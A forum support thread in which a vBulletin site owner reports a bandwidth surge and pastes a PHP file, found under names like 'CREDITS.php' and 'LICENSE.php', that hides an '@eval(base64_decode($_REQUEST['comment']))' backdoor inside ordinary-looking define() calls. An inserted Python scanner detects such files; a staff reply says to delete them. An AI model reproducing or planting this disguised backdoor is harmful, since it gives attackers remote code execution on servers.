Has my server been hacked?

  • [CMS] Has my server been hacked?

    I'm investigating a sudden surge in the bandwidth usage this month as I've used 50% of the monthly allocation in 2 days. My SQL server collapsed several times as well. I'm running a VPS so I shouldn't be getting problems from other users.
    Right, I've run a suspect file scan and have found a lot of files inserted about a week ago, and all of the files are PHP but have different names. An example is that some are called "CREDITS.php", "news2.class.php", "LICENSE.php" and so on. All the files have the same code though.
    Code:
    <?PHP
    define('REAL_SERVER_ROOT', 'SERVER');
    //DIR
    define('SERVER_ROOT', '.');
    define('SERVER_VERSION', '2.5');
    define('BOOT_DIR', 'bootstrap');
    define('SYSTEM_DIR', 'system');
    define('SYSTEM_CONF_DIR', 'conf');
    define('SYSTEM_CONF_PATH', SERVER_ROOT . '/' . SYSTEM_DIR . '/' . SYSTEM_CONF_DIR);
    define('KERNEL_DIR', 'kernel');
    define('SERVICES_DIR', 'services');
    define('LIBRARIES_DIR', 'libs');
    define('FRAMEWORKS_DIR', 'Frameworks');
    define('IMPLEMENTATIONS_DIR', 'implementations');
    define('EXTERN_DIR', 'extern');
    //APP
    define('APPS_DIR', 'apps');
    define('USERS_DIR', 'users');
    define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
    define('USERS_CONF_DIR', 'conf');
    define('USERS_FILES_DIR', 'files');
    define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['comment'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
    define('USERS_SHARE_DIR', 'share');
    define('USERS_META_DIR', 'meta');
    define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
    define('WORKGROUPS_DIR', 'workgroups');
    define('WORKGROUPS_PATH', SERVER_ROOT . '/' . WORKGROUPS_DIR);
    //CONF
    define('WORKGROUPS_CONF_DIR', 'conf');
    define('WORKGROUPS_FILES_DIR', 'files');
    define('WORKGROUPS_METAFILES_DIR', 'metafiles');
    define('WORKGROUPS_META_DIR', 'meta');
    define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
    ?>
    I'm finding these files in the server root, the CMS root, archives, in fact almost everywhere.

    My question is: was I hacked, and if so, is there a procedure to clean up vBulletin, please?
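
A scan for the pattern in the files quoted above, as an added example that is not part of the original post or of vBulletin: it flags PHP files where eval() or assert() is fed from request input and groups them by content hash, since the poster found identical code under many names. The regex, the function names and the sample tree are assumptions constructed for illustration.

```python
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# eval()/assert() fed from request input, directly or through decoder calls.
REQUEST_EVAL = re.compile(
    rb"\b(?:eval|assert)\s*\(\s*(?:\w+\s*\(\s*)*\$_(?:REQUEST|POST|GET|COOKIE)\b",
    re.IGNORECASE,
)

# Constructed sample: the eval line quoted in the post, inert as a bytes literal.
BACKDOOR = (b"<?PHP\ndefine('SYSTEM_SKEL_DIR', 'skel') ? "
            b"@eval(base64_decode($_REQUEST['comment'])) : "
            b"define('SYSTEM_SKEL_PATH', 'x');\n?>\n")
CLEAN = b"<?php\necho base64_decode('aGVsbG8=');\n"


def scan(root):
    """Map sha256 -> sorted paths of PHP files that match REQUEST_EVAL."""
    groups = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep walking
            if REQUEST_EVAL.search(data):
                groups[hashlib.sha256(data).hexdigest()].append(path)
    return {digest: sorted(paths) for digest, paths in groups.items()}


def build_sample_tree(root):
    """Write a constructed tree: three same-content drops and one clean file."""
    layout = {"CREDITS.php": BACKDOOR, "cms/news2.class.php": BACKDOOR,
              "archive/LICENSE.php": BACKDOOR, "cms/index.php": CLEAN}
    for rel, body in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for digest, paths in scan(tmp).items():
            print(digest[:12], *paths, sep="\n  ")
```

One hash with many paths means a single dropped payload copied around the tree; files that match under other hashes are variants to review separately.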

  • #2
    Looks like problematic files at first glance. They should be deleted and aren't part of vBulletin. You should contact your hosting provider to see where the files came from.

    Wayne Luke



    • #3
      Thanks for the reply. I have contacted my host who are investigating it now. My vBulletin is up to date so I'm happy that it survived... unfortunately my VBgallery isn't and unlikely to be by the looks of the developers... That makes a weak system.
      It's a shame vBulletin hasn't got a comprehensive gallery...

      Thanks again though Wayne
